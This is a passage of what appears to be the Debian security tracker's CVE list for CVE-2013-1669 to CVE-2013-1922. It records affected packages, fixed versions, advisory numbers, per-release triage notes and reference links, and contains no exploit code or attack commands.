CVE-2013-1922 (qemu-nbd in QEMU, as used in Xen 4.2.x, determines the format of a raw ...)
	- xen (qemu-nbd-xen built, but not installed into the binary packages)
	- qemu 1.5.0+dfsg-1 (low; bug #705544)
	[squeeze] - qemu (Minor issue)
	[wheezy] - qemu (Minor issue)
	- xen-qemu-dm-4.0 (qemu-nbd not installed by the binary package)
CVE-2013-1921
	RESERVED
CVE-2013-1920 (Xen 4.2.x, 4.1.x, and earlier, when the hypervisor is running "under ...)
	- xen (XSM not enabled in build)
	NOTE: Debian package not built with XSM_ENABLE, so the resulting binary packages are not affected
CVE-2013-1919 (Xen 4.2.x and 4.1.x does not properly restrict access to IRQs, which ...)
	{DSA-2662-1}
	- xen 4.1.4-3
	NOTE: http://lists.xen.org/archives/html/xen-announce/2013-04/msg00003.html
CVE-2013-1918 (Certain page table manipulation operations in Xen 4.1.x, 4.2.x, and ...)
	{DSA-2666-1}
	- xen 4.1.4-4
CVE-2013-1917 (Xen 3.1 through 4.x, when running 64-bit hosts on Intel CPUs, does not ...)
	{DSA-2662-1}
	- xen 4.1.4-3
	NOTE: http://lists.xen.org/archives/html/xen-announce/2013-04/msg00005.html
CVE-2013-1916
	RESERVED
	NOT-FOR-US: WordPress plugin
CVE-2013-1915 (ModSecurity before 2.7.3 allows remote attackers to read arbitrary ...)
	{DSA-2659-1}
	- modsecurity-apache 2.6.6-6 (bug #704625)
	- libapache-mod-security
	NOTE: https://github.com/SpiderLabs/ModSecurity/commit/d4d80b38aa85eccb26e3c61b04d16e8ca5de76fe
	NOTE: http://marc.info/?l=oss-security&m=136499182131283&w=2
CVE-2013-1914 (Stack-based buffer overflow in the getaddrinfo function in ...)
	- eglibc 2.17-2 (bug #704623)
CVE-2013-1913
	RESERVED
CVE-2013-1912 (Buffer overflow in HAProxy 1.4 through 1.4.22 and 1.5-dev through ...)
	- haproxy 1.4.23-1 (bug #704611)
	NOTE: http://git.1wt.eu/web?p=haproxy-1.4.git;a=commitdiff;h=dc80672211
CVE-2013-1911 (lib/ldoce/word.rb in the ldoce 0.0.2 gem for Ruby allows remote ...)
	NOT-FOR-US: ldoce ruby gem
CVE-2013-1910 [Not removing bad metadata and using it in next run]
	RESERVED
	- yum (unimportant)
	NOTE: http://yum.baseurl.org/gitweb?p=yum.git;a=commitdiff;h=c148eb10b798270b3d15087433c8efb2a79a69d0
	NOTE: Only used for bootstraps of chroots, see README.Debian
CVE-2013-1909
	RESERVED
CVE-2013-1908
	RESERVED
CVE-2013-1907
	RESERVED
CVE-2013-1906
	RESERVED
CVE-2013-1905
	RESERVED
CVE-2013-1904 [roundcube variable overwrite]
	RESERVED
	- roundcube 0.7.2-9
	[squeeze] - roundcube (Vulnerable code not present)
CVE-2013-1903 (PostgreSQL, possibly 9.2.x before 9.2.4, 9.1.x before 9.1.9, 9.0.x ...)
	- postgresql-9.1 (installer related)
	- postgresql-8.4 (installer related)
CVE-2013-1902 (PostgreSQL, 9.2.x before 9.2.4, 9.1.x before 9.1.9, 9.0.x before ...)
	- postgresql-9.1 (installer related)
	- postgresql-8.4 (installer related)
CVE-2013-1901 (PostgreSQL 9.2.x before 9.2.4 and 9.1.x before 9.1.9 does not properly ...)
	{DSA-2658-1}
	- postgresql-9.1 9.1.9-1
CVE-2013-1900 (PostgreSQL 9.2.x before 9.2.4, 9.1.x before 9.1.9, 9.0.x before ...)
	{DSA-2658-1 DSA-2657-1}
	- postgresql-9.1 9.1.9-1
	- postgresql-8.4 8.4.17-1
CVE-2013-1899 (Argument injection vulnerability in PostgreSQL 9.2.x before 9.2.4, ...)
	{DSA-2658-1}
	- postgresql-9.1 9.1.9-1 (bug #704479)
CVE-2013-1898 (lib/thumbshooter.rb in the Thumbshooter 0.1.5 gem for Ruby allows ...)
	NOT-FOR-US: Ruby gem Thumbshooter
CVE-2013-1897 (The do_search function in ldap/servers/slapd/search.c in 389 Directory ...)
	- 389-ds-base (bug #704421)
	NOTE: http://git.fedorahosted.org/cgit/389/ds.git/commit/?h=389-ds-base-1.2.11&id=5a18c828533a670e7143327893f8171a19062286
	NOTE: https://fedorahosted.org/389/ticket/47308
CVE-2013-1896 RESERVED
CVE-2013-1895 [concurrency issue leading to auth bypass] RESERVED
	- python-bcrypt (bug #704030)
	[squeeze] - python-bcrypt (thread support only introduced after 0.1 release)
	NOTE: https://code.google.com/p/py-bcrypt/source/detail?r=b03cc5246ea21a839fd027da5616d8d470247558
CVE-2013-1894 RESERVED
CVE-2013-1893 RESERVED
	- owncloud (only affecting 5.0 branch)
CVE-2013-1892 [mongodb: SSJI to RCE] RESERVED
	- mongodb 1:2.4.1-1 (bug #704042)
	[wheezy] - mongodb 1:2.0.6-1.1
	NOTE: http://www.openwall.com/lists/oss-security/2013/03/25/7
CVE-2013-1891 RESERVED
CVE-2013-1890 RESERVED
	- owncloud (only affecting 5.0 branch)
CVE-2013-1889 RESERVED
	- libapache2-mod-ruid2 0.9.8-1 (low; bug #704066)
	[wheezy] - libapache2-mod-ruid2 (Minor issue)
	NOTE: Fix: https://github.com/mind04/mod-ruid2/commit/1fed9dda70cd44d54301df19730a29ae0989e0a2
CVE-2013-1888 [Insecure temporary directory handling /tmp/pip-build] RESERVED
	- python-pip
	[squeeze] - python-pip
	NOTE: https://github.com/pypa/pip/pull/780/files
CVE-2013-1887 (Multiple cross-site scripting (XSS) vulnerabilities in the Views ...)
	- drupal6 (only affects 7.x-3.x to 7.x-3.6)
	- drupal7 (views module not packaged)
CVE-2013-1886 RESERVED
CVE-2013-1885 RESERVED
CVE-2013-1884 (The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through ...)
	- subversion 1.7.9-1 (bug #704940)
	[wheezy] - subversion (Subversion HTTPD servers 1.7.0 through 1.7.8 (inclusive))
	[squeeze] - subversion (Subversion HTTPD servers 1.7.0 through 1.7.8 (inclusive))
	NOTE: http://bugs.debian.org/704940#32
	NOTE: http://subversion.apache.org/security/CVE-2013-1884-advisory.txt
CVE-2013-1883 [mantis: remote DoS] RESERVED
	- mantis (only affects 1.2.12 to 1.2.14)
	NOTE: http://www.openwall.com/lists/oss-security/2013/03/21/3
CVE-2013-1882 RESERVED
CVE-2013-1881 RESERVED
CVE-2013-1880 [XSS vulnerability in portfolioPublish demo application] RESERVED
	- activemq (portfolio demo app not shipped in Debian package)
	NOTE: https://issues.apache.org/jira/browse/AMQ-4398
CVE-2013-1879 [XSS vulnerability in scheduled.jsp] RESERVED
	- activemq (scheduler not shipped in Debian package)
	NOTE: https://issues.apache.org/jira/browse/AMQ-4397
CVE-2013-1878 REJECTED
CVE-2013-1877 REJECTED
CVE-2013-1876 REJECTED
CVE-2013-1875 (command_wrap.rb in the command_wrap Gem for Ruby allows remote ...)
	NOT-FOR-US: ruby gem command_wrap
CVE-2013-1874 [Chicken Scheme: code execution] RESERVED
	- chicken (low; bug #702410)
	[squeeze] - chicken (Minor issue)
	[wheezy] - chicken (Minor issue)
	NOTE: http://www.openwall.com/lists/oss-security/2013/03/19/11
CVE-2013-1873 [linux kernel stack memory disclosure] REJECTED
CVE-2013-1872 RESERVED
CVE-2013-1871 RESERVED
CVE-2013-1870 RESERVED
CVE-2013-1869 RESERVED
CVE-2013-1868 [VLC Buffer overflows] RESERVED
	- vlc 2.0.5-1
	NOTE: http://www.videolan.org/security/sa1301.html
CVE-2013-1867 RESERVED
CVE-2013-1866 RESERVED
CVE-2013-1865 (OpenStack Keystone Folsom (2012.2) does not properly perform ...)
	- keystone (only affects folsom)
	NOTE: fixed in experimental with keystone/2012.2.3-2
CVE-2013-1864 [Ekiga billion laughs flaw in ptlib] RESERVED
	NOTE: http://www.openwall.com/lists/oss-security/2013/03/15/6
	- ekiga (bug #704133)
CVE-2013-1863 (Samba 4.x before 4.0.4, when configured as an Active Directory domain ...)
	- samba4 (Debian package only uses ntvfs, see #679678)
	NOTE: http://www.samba.org/samba/history/samba-4.0.4.html
	NOTE: http://www.samba.org/samba/security/CVE-2013-1863
CVE-2013-1862 RESERVED
	- apache2 (unimportant)
	NOTE: Such injection issues are not treated as security issues
CVE-2013-1861 (MariaDB 5.5.x before 5.5.30, 5.3.x before 5.3.13, 5.2.x before 5.2.15, ...)
	- mysql-5.5 (bug #706715)
	- mysql-5.1
	[squeeze] - mysql-5.1 (bug #706715)
	NOTE: https://mariadb.atlassian.net/browse/MDEV-4252
CVE-2013-1860 (Heap-based buffer overflow in the wdm_in_callback function in ...)
	{DSA-2668-1}
	- linux 3.2.41-1
	- linux-2.6
CVE-2013-1859 (The Node Parameter Control module 6.x-1.x for Drupal does not properly ...)
	NOT-FOR-US: Drupal module Node Parameter Control
CVE-2013-1858 (The clone system-call implementation in the Linux kernel before 3.8.3 ...)
	- linux (Only exploitable starting with 3.7)
	- linux-2.6 (Only exploitable starting with 3.7)
	NOTE: http://stealth.openwall.net/xSports/clown-newuser.c
CVE-2013-1857 (The sanitize helper in ...)
	{DSA-2655-1}
	- ruby-actionpack-3.2 3.2.6-6 (bug #703349)
	- ruby-actionpack-2.3 2.3.14-5
	- rails 2.3.14.1
	NOTE: Starting with 2.3.14.1 rails is a transitional package
CVE-2013-1856 (The ActiveSupport::XmlMini_JDOM backend in ...)
	- ruby-activesupport-2.3 (Only affects 3.x and later)
	- ruby-activesupport-3.2 3.2.6-6 (bug #703350)
	- rails (Only affects 3.x and later)
	NOTE: Starting with 2.3.14.1 rails is a transitional package
CVE-2013-1855 (The sanitize_css method in ...)
	{DSA-2655-1}
	- ruby-actionpack-3.2 3.2.6-6 (bug #703349)
	- ruby-actionpack-2.3 2.3.14-5
	- rails 2.3.14.1
	NOTE: Starting with 2.3.14.1 rails is a transitional package
CVE-2013-1854 (The Active Record component in Ruby on Rails 2.3.x before 2.3.18, ...)
	{DSA-2655-1}
	- ruby-activerecord-3.2 3.2.6-5 (bug #703348)
	- ruby-activerecord-2.3 2.3.14-6
	- ruby-activesupport-2.3 2.3.14-7
	- rails 2.3.14.1
	NOTE: Starting with 2.3.14.1 rails is a transitional package
CVE-2013-1853 [Almanah doesn't encrypt the database] RESERVED
	- almanah 0.9.1-1 (bug #702905)
	[squeeze] - almanah (Only affects Almanah used in combination with glib 2.32)
	NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=695117
CVE-2013-1852 RESERVED
CVE-2013-1851 [user_migrate: Local file disclosure] RESERVED
	- owncloud 4.0.8debian-1.6 (bug #703094)
	NOTE: https://owncloud.org/about/security/advisories/oC-SA-2013-010/
	NOTE: http://www.openwall.com/lists/oss-security/2013/03/14/8
CVE-2013-1850 [Contacts: Bypass of file blacklist] RESERVED
	- owncloud 4.0.8debian-1.6 (bug #703094)
	NOTE: https://owncloud.org/about/security/advisories/oC-SA-2013-009/
	NOTE: http://www.openwall.com/lists/oss-security/2013/03/14/8
CVE-2013-1849 (The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through ...)
	- subversion 1.7.9-1 (bug #704940)
	[wheezy] - subversion 1.6.17dfsg-4+deb7u2
	NOTE: http://seclists.org/fulldisclosure/2013/Mar/56
CVE-2013-1848 (fs/ext3/super.c in the Linux kernel before 3.8.4 uses incorrect ...)
	- linux 3.2.41-1
	- linux-2.6
	[squeeze] - linux-2.6 (Introduced in 2.6.33)
	NOTE: http://www.openwall.com/lists/oss-security/2013/03/20/8
CVE-2013-1847 (The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through ...)
	- subversion 1.7.9-1 (bug #704940)
	[wheezy] - subversion 1.6.17dfsg-4+deb7u2
	NOTE: http://subversion.apache.org/security/CVE-2013-1847-advisory.txt
CVE-2013-1846 (The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before ...)
	- subversion 1.7.9-1 (bug #704940)
	[wheezy] - subversion 1.6.17dfsg-4+deb7u2
	NOTE: http://subversion.apache.org/security/CVE-2013-1846-advisory.txt
CVE-2013-1845 (The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before ...)
	- subversion 1.7.9-1 (bug #704940)
	[wheezy] - subversion 1.6.17dfsg-4+deb7u2
	NOTE: http://subversion.apache.org/security/CVE-2013-1845-advisory.txt
CVE-2013-1844 (Cross-site scripting (XSS) vulnerability in Piwik before 1.11 allows ...)
	- piwik (bug #506933)
CVE-2013-1843 (Open redirect vulnerability in the Access tracking mechanism in TYPO3 ...)
	{DSA-2646-1}
	- typo3-src 4.5.19+dfsg1-5 (bug #702574)
CVE-2013-1842 (SQL injection vulnerability in the Extbase Framework in TYPO3 4.5.x ...)
	{DSA-2646-1}
	- typo3-src 4.5.19+dfsg1-5 (bug #702574)
CVE-2013-1841 [Reverse lookup issue in Net::Server] RESERVED
	- libnet-server-perl (low; bug #702914)
	[wheezy] - libnet-server-perl (Minor issue)
	[squeeze] - libnet-server-perl (Minor issue)
	NOTE: https://rt.cpan.org/Ticket/Display.html?id=83909
CVE-2013-1840 (The v1 API in OpenStack Glance Essex (2012.1), Folsom (2012.2), and ...)
	- glance 2012.1.1-5 (bug #703063)
CVE-2013-1839 [DoS (loop, 100% cpu) strHdrAcptLangGetItem() at errorpage.cc] RESERVED
	- squid3 (the errors were introduced in trunk rev.11496 in 3.2.0.9)
	NOTE: According to http://seclists.org/bugtraq/2013/Mar/68 not affecting 3.1?
	NOTE: http://bazaar.launchpad.net/~squid/squid/3.2/revision/11796
CVE-2013-1838 (OpenStack Nova Grizzly, Folsom (2012.2), and Essex (2012.1) does not ...)
	- nova 2012.1.1-15 (bug #703064)
CVE-2013-1837 RESERVED
CVE-2013-1836 (Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and ...)
	- moodle (bug #703870)
	[squeeze] - moodle (Vulnerable code not present)
CVE-2013-1835 (Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and ...)
	- moodle (bug #703870)
	[squeeze] - moodle (Vulnerable code not present)
CVE-2013-1834 (notes/edit.php in Moodle 1.9.x through 1.9.19, 2.x through 2.1.10, ...)
	- moodle (low; bug #703870)
	[squeeze] - moodle (Minor issue)
CVE-2013-1833 (Multiple cross-site scripting (XSS) vulnerabilities in the File Picker ...)
	- moodle (bug #703870)
	[squeeze] - moodle (Vulnerable code not present)
CVE-2013-1832 (repository/webdav/lib.php in Moodle 2.x through 2.1.10, 2.2.x before ...)
	- moodle (bug #703870)
	[squeeze] - moodle (Vulnerable code not present)
CVE-2013-1831 (lib/setuplib.php in Moodle through 2.1.10, 2.2.x before 2.2.8, 2.3.x ...)
	- moodle (low; bug #703870)
	[squeeze] - moodle (Minor issue)
CVE-2013-1830 (user/view.php in Moodle through 2.1.10, 2.2.x before 2.2.8, 2.3.x ...)
	- moodle (low; bug #703870)
	[squeeze] - moodle (Minor issue)
CVE-2013-1829 (calendar/managesubscriptions.php in Moodle 2.4.x before 2.4.2 does not ...)
	- moodle (Only in 2.4 to 2.4.1)
CVE-2013-1828 (The sctp_getsockopt_assoc_stats function in net/sctp/socket.c in the ...)
	- linux (Introduced in 3.8)
	- linux-2.6 (Introduced in 3.8)
CVE-2013-1827 (net/dccp/ccid.h in the Linux kernel before 3.5.4 allows local users to ...)
	- linux 3.2.29-1
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-47
CVE-2013-1826 (The xfrm_state_netlink function in net/xfrm/xfrm_user.c in the Linux ...)
	{DSA-2668-1}
	- linux 3.2.32-1 (low)
	- linux-2.6 (low)
	NOTE: Probably gone since 3.2.32-1, but I checked 3.2.41-2
CVE-2013-1825 REJECTED
CVE-2013-1824 RESERVED
	{DSA-2639-1}
	- php5 5.4.4-14
	NOTE: See CVE-2013-1643
	NOTE: http://git.php.net/?p=web/php.git;a=commitdiff;h=e8432b34ee7a196a14a6e0191a00fe73b5a095e7
CVE-2013-1823 (Cross-site scripting (XSS) vulnerability in the Notifications form in ...)
	NOT-FOR-US: Katello
CVE-2013-1822 RESERVED
	- owncloud (owncloud stable4 (4.0.x) is not affected)
	NOTE: https://owncloud.org/about/security/advisories/oC-SA-2013-008/
	NOTE: http://www.openwall.com/lists/oss-security/2013/03/14/8
CVE-2013-1821 (lib/rexml/text.rb in the REXML parser in Ruby before 1.9.3-p392 allows ...)
	- ruby1.9.1 1.9.3.194-8.1 (bug #702525)
	- ruby1.8 1.8.7.358-7 (bug #702526)
	NOTE: http://www.ruby-lang.org/en/news/2013/02/22/rexml-dos-2013-02-22/
CVE-2013-1820 RESERVED
	NOT-FOR-US: tuned (RH-specific powersaving tool)
CVE-2013-1819 (The _xfs_buf_find function in fs/xfs/xfs_buf.c in the Linux kernel ...)
	- linux 3.8-1
	- linux-2.6 (low)
	[squeeze] - linux-2.6 (Too risky to backport, minor impact)
	[wheezy] - linux (Too risky to backport, minor impact)
CVE-2013-1818 [mediawiki mwdoc-filter.php information disclosure] RESERVED
	- mediawiki (mwdoc-filter.php introduced in 1.20)
	NOTE: register_globals is not supported in Debian anyway, see PHP's README.Debian.security
CVE-2013-1817 [mediawiki information disclosure in unblock API] RESERVED
	- mediawiki 1:1.19.4-1 (bug #702305)
CVE-2013-1816 [mediawiki insecure curl usage] RESERVED
	- mediawiki 1:1.19.4-1
CVE-2013-1815 (PackStack 2012.2.3 in Red Hat OpenStack Essex and Folsom can create ...)
	NOT-FOR-US: OpenStack PackStack
CVE-2013-1814 (The users/get program in the User RPC API in Apache Rave 0.11 through ...)
	NOT-FOR-US: Apache Rave
CVE-2013-1813 [busybox insecure subdir creation under /dev] RESERVED
	- busybox 1:1.20.0-8 (low; bug #701965)
	[wheezy] - busybox (Minor issue)
	[squeeze] - busybox (Minor issue)
CVE-2013-1812 RESERVED
	- ruby-openid 2.1.8debian-6 (bug #702217)
	- libopenid-ruby (bug #702217)
	[squeeze] - libopenid-ruby (Minor issue)
CVE-2013-1811 [Reporter can change issue status to 'new'] RESERVED
	- mantis (low; bug #698481)
	[wheezy] - mantis (Minor issue)
	[squeeze] - mantis (Minor issue)
CVE-2013-1810 [summary.php category/project names XSS vulnerability] RESERVED
	- mantis (only affects MantisBT 1.2.12)
CVE-2013-1809 [Gambas creates hijackable directory in /tmp] RESERVED
	- gambas3 (low; bug #702184)
	- gambas2
	[wheezy] - gambas3 (Minor issue)
	[squeeze] - gambas2 (Minor issue)
	NOTE: https://code.google.com/p/gambas/issues/detail?id=365
CVE-2013-1808 (Cross-site scripting (XSS) vulnerability in ZeroClipboard.swf and ...)
	- db4o (unimportant)
	- jenkins (bug #706725)
CVE-2013-1807 RESERVED
CVE-2013-1806 RESERVED
CVE-2013-1805 RESERVED
CVE-2013-1804 RESERVED
CVE-2013-1803 RESERVED
CVE-2013-1802 (The extlib gem 0.9.15 and earlier for Ruby does not properly restrict ...)
	- ruby-extlib 0.9.15-3 (bug #697895)
	- libextlib-ruby (bug #697895)
CVE-2013-1801 (The httparty gem 0.9.0 and earlier for Ruby does not properly restrict ...)
	NOT-FOR-US: httparty Ruby gem
CVE-2013-1800 (The crack gem 0.3.1 and earlier for Ruby does not properly restrict ...)
	- ruby-crack (bug #623900)
CVE-2013-1799 (Gnome Online Accounts (GOA) 3.6.x before 3.6.3 and 3.7.x before ...)
	- gnome-online-accounts
CVE-2013-1798 (The ioapic_read_indirect function in virt/kvm/ioapic.c in the Linux ...)
	{DSA-2668-1}
	- linux 3.2.41-2
	- linux-2.6
	NOTE: http://www.openwall.com/lists/oss-security/2013/03/20/9
CVE-2013-1797 (Use-after-free vulnerability in arch/x86/kvm/x86.c in the Linux kernel ...)
	- linux 3.2.41-2
	- linux-2.6
	NOTE: http://www.openwall.com/lists/oss-security/2013/03/20/9
CVE-2013-1796 (The kvm_set_msr_common function in arch/x86/kvm/x86.c in the Linux ...)
	{DSA-2669-1 DSA-2668-1}
	- linux 3.2.41-2
	- linux-2.6
	NOTE: http://www.openwall.com/lists/oss-security/2013/03/20/9
CVE-2013-1795 (Integer overflow in ptserver in OpenAFS before 1.6.2 allows remote ...)
	{DSA-2638-1}
	- openafs 1.6.1-3
CVE-2013-1794 (Buffer overflow in certain client utilities in OpenAFS before 1.6.2 ...)
	{DSA-2638-1}
	- openafs 1.6.1-3
CVE-2013-1793 RESERVED
CVE-2013-1792 (Race condition in the install_user_keyrings function in ...)
	{DSA-2668-1}
	- linux 3.2.41-1
	- linux-2.6
CVE-2013-1791 RESERVED
CVE-2013-1790 (poppler/Stream.cc in poppler before 0.22.1 allows context-dependent ...)
	- poppler 0.18.4-6 (low; bug #702071)
CVE-2013-1789 (splash/Splash.cc in poppler before 0.22.1 allows context-dependent ...)
	- poppler (vulnerable code introduced in a later version)
	TODO: recheck poppler >= 0.22 when it gets uploaded
CVE-2013-1788 (poppler before 0.22.1 allows context-dependent attackers to cause a ...)
	- poppler 0.18.4-6 (low; bug #702071)
CVE-2013-1787 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...)
	NOT-FOR-US: Drupal addon
CVE-2013-1786 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...)
	NOT-FOR-US: Drupal addon
CVE-2013-1785 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...)
	NOT-FOR-US: Drupal addon
CVE-2013-1784 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...)
	NOT-FOR-US: Drupal addon
CVE-2013-1783 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in ...)
	NOT-FOR-US: Drupal addon
CVE-2013-1782 (Cross-site scripting (XSS) vulnerability in the Responsive Blog Theme ...)
	NOT-FOR-US: Drupal addon
CVE-2013-1781 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...)
	NOT-FOR-US: Drupal addon
CVE-2013-1780 (Cross-site scripting (XSS) vulnerability in the Best Responsive Theme ...)
	NOT-FOR-US: Drupal addon
CVE-2013-1779 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...)
	NOT-FOR-US: Drupal addon
CVE-2013-1778 (Cross-site scripting (XSS) vulnerability in the Creative Theme 7.x-1.x ...)
	NOT-FOR-US: Drupal addon
CVE-2013-1777 RESERVED
CVE-2013-1776 (sudo 1.3.5 through 1.7.10 and 1.8.0 through 1.8.5, when the ...)
	{DSA-2642-1}
	- sudo 1.8.5p2-1+nmu1 (bug #701839)
CVE-2013-1775 (sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through 1.8.6p6 allows ...)
	{DSA-2642-1}
	- sudo 1.8.5p2-1+nmu1 (bug #701838)
	NOTE: severity depends a lot on the environment
CVE-2013-1774 (The chase_port function in drivers/usb/serial/io_ti.c in the Linux ...)
	{DSA-2668-1}
	- linux 3.2.38-1
	- linux-2.6
CVE-2013-1773 (Buffer overflow in the VFAT filesystem implementation in the Linux ...)
	{DSA-2668-1}
	- linux 3.2.15-1
	- linux-2.6
	NOTE: Probably gone since 3.2.15-1, but I checked 3.2.41-2
CVE-2013-1772 (The log_prefix function in kernel/printk.c in the Linux kernel 3.x ...)
	- linux 3.2.39-1
	- linux-2.6 (Vulnerability exposed since 3.0)
CVE-2013-1771 [monkey: world-readable logdir] RESERVED
	- monkey (low)
	[squeeze] - monkey (Minor issue)
	NOTE: http://www.openwall.com/lists/oss-security/2013/02/24/5
CVE-2013-1770 [XSS issues in views_view.php] RESERVED
	- ganglia (low; bug #700158)
	[squeeze] - ganglia (Minor issue)
	[wheezy] - ganglia (Minor issue)
	- ganglia-web (bug #700159)
	NOTE: ganglia-web only in experimental, security-tracker does not handle experimental versions
	NOTE: Upstream non-verified fix https://github.com/ganglia/ganglia-web/commit/552965f33bf79d41ccbec3f1f26840c8bab54ad6
CVE-2013-1769 [Crashes when trying to hash caps containing pathological data forms] RESERVED
	- telepathy-gabble 0.16.5-1 (bug #702252)
CVE-2013-1768 RESERVED
CVE-2013-1767 (Use-after-free vulnerability in the shmem_remount_fs function in ...)
	{DSA-2668-1}
	- linux 3.2.41-1
	- linux-2.6
CVE-2013-1766 (libvirt 1.0.2 and earlier sets the group owner to kvm for device ...)
	{DSA-2650-1}
	- libvirt 0.9.12-8 (bug #701649)
CVE-2013-1765 RESERVED
CVE-2013-1764 RESERVED
	- packagekit (Zypp backend specific to SuSE)
CVE-2013-1763 (Array index error in the __sock_diag_rcv_msg function in ...)
	- linux (Introduced in 3.3)
	NOTE: 3.6.9 and 3.7.8 in experimental are affected, 3.8 will be fixed.
CVE-2013-1762 (stunnel 4.21 through 4.54, when CONNECT protocol negotiation and NTLM ...)
	{DSA-2664-1}
	- stunnel4 3:4.53-1.1 (bug #702267)
CVE-2013-1761 RESERVED
CVE-2013-1760 RESERVED
CVE-2013-1759 RESERVED
CVE-2013-1758 RESERVED
CVE-2013-1757 RESERVED
CVE-2013-1756 RESERVED
CVE-2013-1755 RESERVED
CVE-2013-1754 RESERVED
CVE-2013-1753 RESERVED
CVE-2013-1752 RESERVED
CVE-2013-1751 RESERVED
	- twiki
	NOTE: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2013-1751
CVE-2013-1750 (Heap-based buffer overflow in RealNetworks RealPlayer before 16.0.1.18 ...)
	NOT-FOR-US: RealPlayer
CVE-2013-1749 (Cross-site scripting (XSS) vulnerability in edit.php in PHP Address ...)
	NOT-FOR-US: PHP Address Book
CVE-2013-1748 (Multiple SQL injection vulnerabilities in PHP Address Book 8.2.5 allow ...)
	NOT-FOR-US: PHP Address Book
CVE-2012-6533 (Buffer overflow in pgpwded.sys in Symantec PGP Desktop 10.x and ...)
	NOT-FOR-US: Symantec PGP Desktop
CVE-2013-1747 (channel.c in ngIRCd 20 and 20.1 allows remote attackers to cause a ...)
	- ngircd (Vulnerable version was only in experimental, introduced in 20.1-1~exp1 and fixed in 20.2-1~exp1)
CVE-2013-1746 RESERVED
CVE-2013-1745 RESERVED
CVE-2013-1744 RESERVED
CVE-2013-1743 RESERVED
CVE-2013-1742 RESERVED
CVE-2013-1741 RESERVED
CVE-2013-1740 RESERVED
CVE-2013-1739 RESERVED
CVE-2013-1738 RESERVED
CVE-2013-1737 RESERVED
CVE-2013-1736 RESERVED
CVE-2013-1735 RESERVED
CVE-2013-1734 RESERVED
CVE-2013-1733 RESERVED
CVE-2013-1732 RESERVED
CVE-2013-1731 RESERVED
CVE-2013-1730 RESERVED
CVE-2013-1729 RESERVED
CVE-2013-1728 RESERVED
CVE-2013-1727 RESERVED
CVE-2013-1726 RESERVED
CVE-2013-1725 RESERVED
CVE-2013-1724 RESERVED
CVE-2013-1723 RESERVED
CVE-2013-1722 RESERVED
CVE-2013-1721 RESERVED
CVE-2013-1720 RESERVED
CVE-2013-1719 RESERVED
CVE-2013-1718 RESERVED
CVE-2013-1717 RESERVED
CVE-2013-1716 RESERVED
CVE-2013-1715 RESERVED
CVE-2013-1714 RESERVED
CVE-2013-1713 RESERVED
CVE-2013-1712 RESERVED
CVE-2013-1711 RESERVED
CVE-2013-1710 RESERVED
CVE-2013-1709 RESERVED
CVE-2013-1708 RESERVED
CVE-2013-1707 RESERVED
CVE-2013-1706 RESERVED
CVE-2013-1705 RESERVED
CVE-2013-1704 RESERVED
CVE-2013-1703 RESERVED
CVE-2013-1702 RESERVED
CVE-2013-1701 RESERVED
CVE-2013-1700 RESERVED
CVE-2013-1699 RESERVED
CVE-2013-1698 RESERVED
CVE-2013-1697 RESERVED
CVE-2013-1696 RESERVED
CVE-2013-1695 RESERVED
CVE-2013-1694 RESERVED
CVE-2013-1693 RESERVED
CVE-2013-1692 RESERVED
CVE-2013-1691 RESERVED
CVE-2013-1690 RESERVED
CVE-2013-1689 RESERVED
CVE-2013-1688 RESERVED
CVE-2013-1687 RESERVED
CVE-2013-1686 RESERVED
CVE-2013-1685 RESERVED
CVE-2013-1684 RESERVED
CVE-2013-1683 RESERVED
CVE-2013-1682 RESERVED
CVE-2013-1681 (Use-after-free vulnerability in the ...)
	- iceweasel 17.0.6esr-1
	- icedove
	- iceape
CVE-2013-1680 (Use-after-free vulnerability in the nsFrameList::FirstChild function ...)
	- iceweasel 17.0.6esr-1
	- icedove
	- iceape
CVE-2013-1679 (Use-after-free vulnerability in the ...)
	- iceweasel 17.0.6esr-1
	- icedove
	- iceape
CVE-2013-1678 (The _cairo_xlib_surface_add_glyph function in Mozilla Firefox before ...)
	- iceweasel 17.0.6esr-1
	- icedove
	- iceape
CVE-2013-1677 (The gfxSkipCharsIterator::SetOffsets function in Mozilla Firefox ...)
	- iceweasel 17.0.6esr-1
	- icedove
	- iceape
CVE-2013-1676 (The SelectionIterator::GetNextSegment function in Mozilla Firefox ...)
	- iceweasel 17.0.6esr-1
	- icedove
	- iceape
CVE-2013-1675 (Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, ...)
	- iceweasel 17.0.6esr-1
	- icedove
	- iceape
CVE-2013-1674 (Use-after-free vulnerability in Mozilla Firefox before 21.0, Firefox ...)
	- iceweasel 17.0.6esr-1
	- icedove
	- iceape
CVE-2013-1673 (The Mozilla Updater in Mozilla Firefox before 21.0 on Windows does not ...)
	- iceweasel (Windows build only)
CVE-2013-1672 (The Mozilla Maintenance Service in Mozilla Firefox before 21.0, ...)
	- iceweasel (Windows build only)
	- icedove (Windows build only)
	- iceape (Windows build only)
CVE-2013-1671 (Mozilla Firefox before 21.0 does not properly implement the INPUT ...)
	- iceweasel
	[wheezy] - iceweasel (Doesn't affect ESR 17 series)
	NOTE: fixed in experimental in 21.0-1
CVE-2013-1670 (The Chrome Object Wrapper (COW) implementation in Mozilla Firefox ...)
	- iceweasel 17.0.6esr-1
	- icedove
	- iceape
CVE-2013-1669 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceweasel 17.0.6esr-1
	[wheezy] - iceweasel (Only affects Firefox 20)
	- icedove
	[wheezy] - icedove (Only affects Firefox 20)
	- iceape
	[wheezy] - iceape (Only affects Firefox 20)
	NOTE: fixed in experimental in 21.0-1
